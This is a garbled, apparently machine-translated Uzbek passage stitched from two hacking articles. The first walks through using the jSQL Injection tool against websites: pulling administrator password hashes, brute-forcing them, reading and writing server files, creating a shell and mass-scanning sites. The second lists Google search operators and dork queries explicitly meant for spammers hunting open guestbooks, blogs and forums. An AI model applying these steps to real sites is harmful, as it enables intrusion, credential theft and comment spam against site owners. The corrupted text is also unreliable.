Teri jadvalini ko'rib chiqishingiz mumkin:

Jadvallarda administratorning ismlarini ovoz chiqarib ayting.

Agar sizga omad kulib boqsa va administrator ma'lumotlarini bilgan bo'lsangiz, unda hali erta. Shuningdek, ma'lumotlarni kiritish uchun ma'murni bilish kerak.

5. Adminni jSQL Injection bilan qidiring

Kim uchun keyingi sahifaga o'ting. Bu erda bizga mumkin bo'lgan manzil aytiladi. Qayta ko'rib chiqish uchun bir yoki bir nechta tomonlarni tanlashingiz mumkin:

Boshqa dasturlarni yutish kerak bo'lmaganlarning muvaffaqiyati.

Afsuski, kambag'al dasturchilar, yak ochiq fikrli odamdan parollarni saqlaydi, juda boy emas. Ko'pincha parol qatoriga kiriting

8743b52063cd84097a65d1633f5c74f5

Tse hash. Yogo qo'pol kuch bilan shifrlanishi mumkin. I… jSQL Injection qo'pol majburlash mumkin.

6. JSQL Injection yordamida xeshlarni shafqatsiz kuchlantirish

Shubhasiz, boshqa dasturlardan foydalanish uchun zarur bo'lmaganlar aqlli. Mana, eng mashhur xeshlarning bir nechtasi.

Eng yaxshi variant emas. Xeshlarni shifrlashda guru bo'lish uchun uni rus tili tavsiya qiladi.

Ammo, aniqki, agar boshqa dastur bo'lmasa yoki mashg'ulot uchun vaqt bo'lmasa, kiritilgan qo'pol kuch funktsiyasi bilan jSQL Injection yanada bolalarcha bo'ladi.

Ísnuyu sozlamalari: siz qanday belgilarni o'rnatishingiz va parolni, parol oralig'ini kiritishingiz mumkin.

7. SQL-infektsiyalari aniqlangandan keyin fayllar bilan operatsiyalar

Ma'lumotlar bazalari bilan jinoyat operatsiyalari - o'qish va o'zgartirish, SQL infektsiyasi bo'lsa, tajovuzkor fayl operatsiyalarini engish mumkin:

• serverdagi fayllarni o'qish
• Serverdagi yangi fayllarning hayotiyligi
• serverdagi shell vivantage

Hamma narsa jSQL Injection bilan amalga oshiriladi!

Ê almashinuvi - SQL serveri fayl huquqlariga ega bo'lishi mumkin. Aqlli tizim ma'murlari yomon hid yoqilgan va fayl tizimiga kirish mumkin emas.

Fayl imtiyozlarining mavjudligi osongina noto'g'ri tushuniladi. Yorliqlardan biriga o'ting (fayllarni o'qish, qobiq yaratish, yangi faylni olish) va belgilangan operatsiyalardan birini sinab ko'ring.

Bundan ham muhimroq hurmat - biz mashq qilishimiz mumkin bo'lgan faylga aniq mutlaq yo'lni bilishimiz kerak - aks holda biz hech narsani ko'rmaymiz.

Keyingi skrinshotga qarang:

Fayl bilan operatsiyani sinab ko'rishim haqida bizga aytiladi: FILE imtiyozi yo'q(Fayl imtiyozlari yo'q). Va bu erda hech narsa qilish mumkin emas.

Qanday natomist yana bir afv bor:

[katalog_nomi] ga yozishda muammo

Bu faylni yozish uchun zarur bo'lgan mutlaq yo'lni noto'g'ri kiritganingizni anglatadi.

Mutlaq yo'lni tanlash uchun, kamida, server ishlaydigan operatsion tizimni bilish kerak. Buning uchun "Tarmoq" yorlig'iga o'ting.

Bunday rekord (qator Win64) bizga maslahat bering, Windows OS bilan o'ng tomonda nima qilish mumkin:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Ulanish: Keep-Alive usuli: HTTP/1.1 200 OK Kontent uzunligi: 353 Sana: 20-dekabr, 11-juma 11:48:31 GMT X-Powered-by: PHP/7.0.0RC6 Kontent turi: matn/html; charset=UTF-8

Mana bizda Unix versiyasi mavjud (*BSD, Linux):

Transfer-kodlash: parchalangan sana: 2015-yil 11-dekabr 11:57:02 GMT usuli: HTTP/1.1 200 OK Jonli saqlash: vaqt tugashi=3, maks=100 Ulanish: tirik qolish Kontent turi: matn/html X- Muallif: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

Va bizda CentOS mavjud:

Usul: HTTP/1.1 200 OK Muddati tugaydi: 1981 yil 19-noyabr, payshanba, 08:52:00 GMT oʻrnatilgan cookie-fayl: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Ulanish: keep-alive X-Cache-Lookup: MISS like t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Kesh: MISS like t1.hoster.ru Kesh-nazorat: do'kon yo'q, kesh yo'q, qayta tekshirish kerak, tekshirishdan keyingi=0, oldindan tekshirish=0 Pragma: kesh yo'q Sana: 2015 yil 11 dekabr, 12:08:54 GMT Transfer-kodlash: bo'laklangan tarkib turi: matn/html; charset=WINDOWS-1251

Windows-da saytlar uchun odatiy papka mavjud C:\Server\data\htdocs\. Ammo, haqiqatan ham, agar siz Windows-da serverni ishga tushirish haqida "o'ylayotgan bo'lsangiz", ehtimol, bu odam imtiyozlar haqida hech narsa o'ylamagan. Boshlash uchun C:/Windows/ katalogidan quyidagilarni sinab ko'ring:

Yak bachimo, hamma narsa birinchi marta mo''jizaviy tarzda ketdi.

Lekin jSQL Injection qobiqlarining o'zi meni sumniv deb ataydi. Agar sizda fayl imtiyozlari mavjud bo'lsa, veb-interfeys bilan istalgan narsani olishingiz mumkin.

8. SQL-ín'êktsííí saytlarni ommaviy qayta tekshirish

È jSQL Injection uchun ushbu funksiyani boshqaring. Hammasi oddiyroq - saytlar ro'yxatini kiriting (siz uni fayldan import qilishingiz mumkin), agar siz uni o'zgartirmoqchi bo'lsangiz, uni tanlang va operatsiyani boshlash uchun tugmani bosing.

jSQL in'ektsiyasi uchun Wisnovok

jSQL Injection - bu SQL in'ektsiya saytlarida topilgan ba'zi noaniq bilimlar bilan hazil qilish uchun yaxshi, qiyin vosita. Cheksiz plyuslar mavjud: tanlovning soddaligi, hamrohlik qiluvchi funktsiyalarni joriy etish. jSQL Injection yangi boshlanuvchilar uchun veb-saytlarni tahlil qilish uchun eng yaxshi do'st bo'lishi mumkin.

Kamchiliklardan men ma'lumotlar bazalarini tahrirlashning iloji yo'qligi haqida gapirgan bo'lardim (qaysi funksionallikni qabul qilishimni bilmayman). Grafik interfeysga ega barcha vositalar singari, dasturlarni skriptlarda vikoristannyaning imkonsizligi bilan bog'lash mumkin. Proteak avtomatizatsiyasi mumkin va ushbu dasturda siz saytlarni ommaviy qayta tekshirish funksiyasini boshlashingiz mumkin.

jSQL Injection dasturi sqlmapga qaraganda ancha yaxshi. Ale sqlmap SQL-in'actionsning ko'proq turlarini qo'shadi, fayl xavfsizlik devorlari va boshqa funktsiyalar bilan ishlash imkoniyatlariga ega bo'lishi mumkin.

Sub-bag: jSQL Injection xakerning eng yaxshi do'stidir.

Siz ushbu dasturning qisqacha mazmunini Kali Linux entsiklopediyasida topishingiz mumkin: http://kali.tools/?p=706

Yak to'g'ri Shukat yordam uchun google.com

Har bir inson, Google kabi, bunday firibgarlik tizimi bilan birga kuyladi =) Lekin siz qo'shimcha maxsus konstruktsiyalar uchun shukovic so'rovini qanday qilib to'g'ri katlashni bilmasangiz, unda siz shukaête boy samarali va shvidshe =) natijalarga erishishingiz mumkin va qanday qilib siz ishlashingiz, to'g'ri shukat qilishingiz kerak

Google google.com saytida qidiruv soatlari uchun maxsus qiymatga ega bo'lishi mumkin bo'lgan qidiruvlar uchun bir nechta kengaytma operatorlarini qo'llab-quvvatlaydi. Odatda, qi operatorlari qidiruvlarni o'zgartiradilar yoki ular Googlega mutlaqo boshqa turdagi qidiruvlarni amalga oshiradigan ko'rinadi. Masalan, qurilish havola:ê maxsus operator tomonidan, ya'ni havola: www.google.com Men sizga oddiy hazil qilmayman, lekin keling, barcha veb-saytlarni, google.com ga havolalarni qanday qilishni bilib olaylik.
muqobil ichimliklar turlari

kesh: Agar so'rovga boshqa so'zlarni kiritsangiz, Google keshlangan hujjat chegaralarida kiritilgan so'zlar sonini ajratib ko'rsatadi.
Misol uchun, kesh: www.web sayti"veb" so'zi yordamida naqd pul olishni ko'rsatish.

havola: Daniya qidiruv so'rovi sizga so'ralgan so'rov uchun murojaat qilishingiz mumkin bo'lgan veb-sahifalarni ko'rsatadi.
Misol uchun: havola: www.website barcha tomonlarini ko'rsating, buning uchun ê http://www.site ga murojaat qiling

bog'liq: Belgilangan veb-saytga "o'xshash" (bog'liq) veb-sahifalarni ko'ring.
Misol uchun, tegishli: www.google.com perehuê veb-tomonlari, yaki ê podíbimi uyga í̈ storínki Google.

ma'lumot: Ma'lumot so'rash: Google veb-sahifani so'rash haqida bir oz ma'lumotga ega bo'lishi mumkin.
Misol uchun, ma'lumot: veb-sayt forumimiz haqida ma'lumot ko'rsatish =) (Armada - Kattalar Webmaster Forumi).

Boshqa ma'lumotlar so'rovlari

aniqlang: So'rovni aniqlang: maxsus so'zlarni ta'minlash, buyurtmadan keyin qanday kiritishingiz, turli dantelli satrlardan tanlangan. U barcha kiritilgan iboralarga tayinlanadi (shuning uchun biz barcha so'zlarni aniq so'rovga kiritamiz).

Aktsiyalar: Agar siz aktsiyalardan so'rovni boshlasangiz: Google birja havolalarining ramzi sifatida shartlarning yechimini qayta ishlaydi va uchinchi tomon bilan bog'lanadi, shunda u sizga ushbu belgilar uchun ma'lumotlarni ko'rsatadi.
Misol uchun, Aktsiyalar: Intel Yahoo Intel va Yahoo haqidagi ma'lumotlarni ko'rsatish. (Kompaniya nomini ko'rsatmasdan, qolgan yangiliklarning belgilarini buzganingizda nima aybdor ekanligingizni aniqlang)

Modifikatorlarni so'rash

sayt: Agar siz so'rovingizga saytni qo'shsangiz, Google natijalarni o'sha domenda joylashgan veb-saytlar bilan o'rab oladi.
Ru, org, com va boshqalar kabi boshqa zonalar orqali ham qidirishingiz mumkin ( sayt: com sayt:ru)

allintitle: Agar siz allintitle: soʻrovini bajarsangiz, Google natijalarni sarlavhadagi eng koʻp soʻz bilan oʻrab oladi.
Misol uchun, allintitle: Google qidiruvi Rasmlar, bloglar va hokazolarni qidirish uchun Google-ning barcha tomonlarini aylantiring

sarlavha: Shuningdek, siz sarlavhani kiritasiz: sizning so'rovingiz bo'yicha Google natijalarni sarlavhadagi so'zni almashtirish uchun hujjatlar bilan o'rab oladi.
Misol uchun, sarlavha: Biznes

allinurl: Shunday qilib, siz allinurl bilan so'rovni bajarasiz: Google natijalarni o'rab oladi, URLni bir necha so'z bilan so'rang.
Misol uchun, allinurl: Google qidiruvi Hujjatni Google-dan aylantiring va sarlavhasidan qidiring. Bundan tashqari, variant sifatida siz so'zlarni slash (/) bilan ajratishingiz mumkin, xuddi shu so'zlarni bir tomonning chegaralarida ranjitgan slashning yon tomonlarida: Butt allinurl: foo/bar

inurl: Shuningdek, siz inurl ni ham qo'shishingiz mumkin: sizning so'rovingiz bo'yicha Google URLdagi so'zni olib tashlash uchun natijalarni hujjatlar bilan o'rab oladi.
Misol uchun, Animatsiya inurl:veb-sayt

matn: hazil faqat tomoni matnida bir so'z tayinlangan, qo'shimchali matn nomi e'tiborsizlik, va boshqa, ilgari ko'rilmagan. Va shuningdek, ushbu modifikatorning narxi - allintext: tobto. Agar so'rovdagi barcha so'zlar faqat matnda aralashtiriladi, bu ham muhim, xabarlarda tez-tez takrorlanadigan so'zlarga e'tibor bermaslik.
Misol uchun, matn: forum

sana oralig'i: vaqt oralig'ida shukaê (sana oralig'i: 2452389-2452389), soat uchun sanalar Julian formatida ko'rsatilgan.

Xo'sh, va barcha turdagi cicadas ichimliklar uchun amal qiladi

Google uchun katlama soʻrovini qoʻllash. Spamerlar uchun

inurl:control.guest?a=sign

Sayt:books.dreambook.com "Bosh sahifa URL" "Ro'yxatdan o'tish" inurl:sign

Sayt: www.freegb.net Bosh sahifa

Inurl:sign.asp "Belgilar soni"

"Xabar:" inurl:sign.cfm "Yuborgan:"

inurl:register.php "Foydalanuvchini ro'yxatdan o'tkazish" "Veb-sayt"

Inurl:edu/mehmonlar kitobi “Mehmonlar kitobiga imzo cheking”

Inurl: post "Izoh qoldirish" "URL"

Inurl:/archives/ “Izohlar:” “Ma’lumot esdami?

“Skript va mehmonlar kitobi tomonidan yaratilgan:” “URL:” “Izohlar:”

inurl:?action=add “phpBook” “URL”

Sarlavha: "Yangi hikoyani yuborish"

Jurnallar

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru/re.pl? "Mehmonlar kitobi"

Bloglar

Inurl:blogger.com/comment.g?"postID""anonim"

Inurl:typepad.com/ "Izoh qoldirish" "Shaxsiy ma'lumot esdami?"

Inurl:greatestjournal.com/community/ "Izoh qoldirish" "anonim plakatlar manzillari"

"Izoh qoldirish" "anonim plakatlarning manzillari" -

Sarlavha: "Izoh qoldirish"

Inurl:pirillo.com “Izoh qoldirish”

forumi

Inurl:gate.html?”name=Forums” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl: "mes.php?"

inurl: "members.html"

inurl:forum/memberlist.php?"